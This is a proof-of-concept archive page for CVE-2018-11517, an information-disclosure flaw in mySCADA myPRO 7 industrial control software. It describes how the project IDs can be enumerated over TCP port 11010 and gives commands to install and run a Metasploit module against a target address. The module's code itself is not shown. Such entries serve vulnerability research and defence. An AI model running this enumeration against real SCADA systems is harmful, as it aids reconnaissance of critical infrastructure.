Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2018-11517 PoC — mySCADA myPRO 安全漏洞

Source
Associated Vulnerability
Title: mySCADA myPRO 安全漏洞 (CVE-2018-11517)
Description:mySCADA myPRO 7 allows remote attackers to discover all ProjectIDs in a project by sending all of the prj parameter values from 870000 to 875000 in t=0&rq=0 requests to TCP port 11010.
Description
CVE-2018-11517 | mySCADA myPRO v7.0.46 has another vulnerability to discover all projects in the system.
Readme
# mySCADA myPRO 7 - projectID Disclosure

mySCADA myPRO v7.0.46 has another vulnerability to discover all projects in the system.

## CVE-2018-11517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11517

```
git clone https://github.com/EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure.git
 
cd mySCADA-myPRO-7-projectID-Disclosure/

cp mypro_enum_projectid.rb /usr/share/metasploit-framework/modules/auxiliary/gather/

msfconsole

use auxiliary/gather/mypro_enum_projectid 

set RHOST [IP ADDRESS]

run
```

![alt tag](https://emreovunc.com/images/mySCADA_myPRO7-projectID.png)
-
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →